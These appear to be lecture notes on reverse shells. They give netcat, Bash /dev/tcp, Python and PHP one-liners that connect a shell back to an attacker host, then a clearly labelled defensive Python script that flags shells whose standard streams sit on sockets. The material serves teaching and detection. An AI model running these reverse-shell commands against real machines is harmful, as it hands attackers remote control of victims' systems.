Lecture 6 Codes

The document describes four methods to establish a reverse shell connection from a target machine to an attacker's machine: 1. Using Netcat to execute a shell that connects back to the attacker's IP and port. 2. Using Bash to execute a shell that connects back via TCP. 3. Using a Python script to create a socket connection, duplicate file descriptors, and execute a reverse shell. 4. Using a PHP code snippet to open a socket connection and execute a reverse shell that redirects stdin, stdout, and stderr over the socket.

Reverse shell techniques to establish a network connection from the target machine to an attacker-controlled machine

Example 1: Using Netcat (nc)

nc -e /bin/sh <attacker IP> <attacker port>
OR
nc -e /bin/sh 10.0.0.1 1234

nc -l -p 8080 -vvv sets up a Netcat listener on a specific port (here 8080) on the attacker's machine. Each additional v increases the verbosity of the output.
Example 2: Using Bash
bash -i >& /dev/tcp/<attacker IP>/<attacker port> 0>&1
OR
bash -i >& /dev/tcp/10.0.0.1/8080 0>&1

Example 3: Using Python code


import socket, subprocess, os

# Step 1: create a TCP socket object
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

# Step 2: connect to the attacker's machine
s.connect(("<attacker IP>", <attacker port>))

# Step 3: duplicate the socket file descriptor onto stdin, stdout, and stderr
os.dup2(s.fileno(), 0)
os.dup2(s.fileno(), 1)
os.dup2(s.fileno(), 2)

# Step 4: execute a shell ("/bin/sh") with the "-i" flag for interactive mode
p = subprocess.call(["/bin/sh", "-i"])

OR
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Example 4: Using PHP Code


php -r '$sock=fsockopen("<attacker IP>", <attacker port>);exec("/bin/sh -i <&3 >&3 2>&3");'
OR
php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'

Explanation
$sock=fsockopen("<attacker IP>", <attacker port>);

fsockopen: This function opens a network connection or a socket to the specified IP address
and port.
<attacker IP>: Replace this with the actual IP address of the machine controlled by the
attacker.
<attacker port>: Replace this with the port number on which the attacker is listening for the
connection.
The result of fsockopen is assigned to the variable $sock.

exec("/bin/sh -i <&3 >&3 2>&3");

exec: This function is used to execute a command.

"/bin/sh -i <&3 >&3 2>&3": This command executes a shell (/bin/sh) with the -i flag for interactive mode.
<&3: Connects the shell's standard input to file descriptor 3, the socket opened by fsockopen.
>&3: Redirects standard output to file descriptor 3.
2>&3: Redirects standard error to file descriptor 3.
With all three standard streams attached to the socket, the shell reads its commands from, and sends its output to, the attacker's listener.
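All four examples above leave the same trace on the target: the shell's file descriptors 0, 1 and 2 end up attached to a network socket (explicitly through dup2 in Example 3, through the <&3 >&3 2>&3 redirections in Example 4, and implicitly through nc -e and bash's /dev/tcp). That is the footprint a defender can look for. The following Python script is an added example and is not part of the lecture notes. It assumes a Linux /proc filesystem for the live scan (on systems without /proc the scan simply returns nothing) and flags any shell process whose three standard streams all resolve to a socket; the fd tables at the bottom are constructed samples showing what a reverse shell and a normal interactive shell look like in /proc/<pid>/fd.

```python
"""Flag processes whose stdin, stdout and stderr are all sockets.

Added example (not from the lecture notes). Assumes Linux: /proc/<pid>/fd/<n>
is a symlink whose target reads "socket:[<inode>]" for a socket. The
classification logic is pure so it can be exercised on constructed fd tables.
"""
import os
import re

# Process names that are interactive shells; a shell with every std stream
# on a socket is the pattern the reverse-shell one-liners above produce.
SHELL_NAMES = {"sh", "bash", "dash", "zsh", "ash"}
SOCKET_LINK = re.compile(r"^socket:\[\d+\]$")


def std_fds_are_sockets(fd_targets):
    """fd_targets maps fd number -> readlink target of /proc/<pid>/fd/<n>.
    True when fds 0, 1 and 2 all resolve to a socket."""
    return all(SOCKET_LINK.match(fd_targets.get(fd, "")) for fd in (0, 1, 2))


def classify_process(comm, fd_targets):
    """Return "ok", an "info:" label, or a "suspicious:" label for one process."""
    if not std_fds_are_sockets(fd_targets):
        return "ok"
    if os.path.basename(comm) in SHELL_NAMES:
        return "suspicious: shell with all std fds on a socket"
    # Daemons spawned by inetd-style supervisors legitimately look like this.
    return "info: std fds on a socket (non-shell process)"


def read_fd_targets(pid):
    """Collect {fd: link target} for one pid; unreadable entries are skipped."""
    targets = {}
    fd_dir = f"/proc/{pid}/fd"
    try:
        names = os.listdir(fd_dir)
    except OSError:  # process gone or not ours to inspect
        return targets
    for name in names:
        try:
            targets[int(name)] = os.readlink(os.path.join(fd_dir, name))
        except (OSError, ValueError):
            continue
    return targets


def read_comm(pid):
    try:
        with open(f"/proc/{pid}/comm") as f:
            return f.read().strip()
    except OSError:
        return ""


def scan_proc():
    """Walk /proc and return [(pid, comm, label)] for every non-"ok" process."""
    findings = []
    if not os.path.isdir("/proc"):
        return findings
    for entry in os.listdir("/proc"):
        if not entry.isdigit():
            continue
        pid = int(entry)
        comm = read_comm(pid)
        label = classify_process(comm, read_fd_targets(pid))
        if label != "ok":
            findings.append((pid, comm, label))
    return findings


# Constructed samples: fd table of a shell started by the dup2()-style
# reverse shell above, and of an ordinary shell attached to a terminal.
SAMPLE_REVERSE_SHELL = {
    0: "socket:[48213]", 1: "socket:[48213]", 2: "socket:[48213]", 3: "socket:[48213]",
}
SAMPLE_NORMAL_SHELL = {0: "/dev/pts/0", 1: "/dev/pts/0", 2: "/dev/pts/0"}

if __name__ == "__main__":
    print("sample reverse shell:", classify_process("sh", SAMPLE_REVERSE_SHELL))
    print("sample normal shell:", classify_process("bash", SAMPLE_NORMAL_SHELL))
    for pid, comm, label in scan_proc():
        print(pid, comm, label)
```

Run it as root to inspect every process; unprivileged, it only sees your own processes. The check keys on the mechanism (all three standard streams on a socket) rather than on any particular command line, so it catches the nc, bash, Python and PHP variants alike, and the "info" tier keeps legitimate socket-activated services from being reported as shells.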
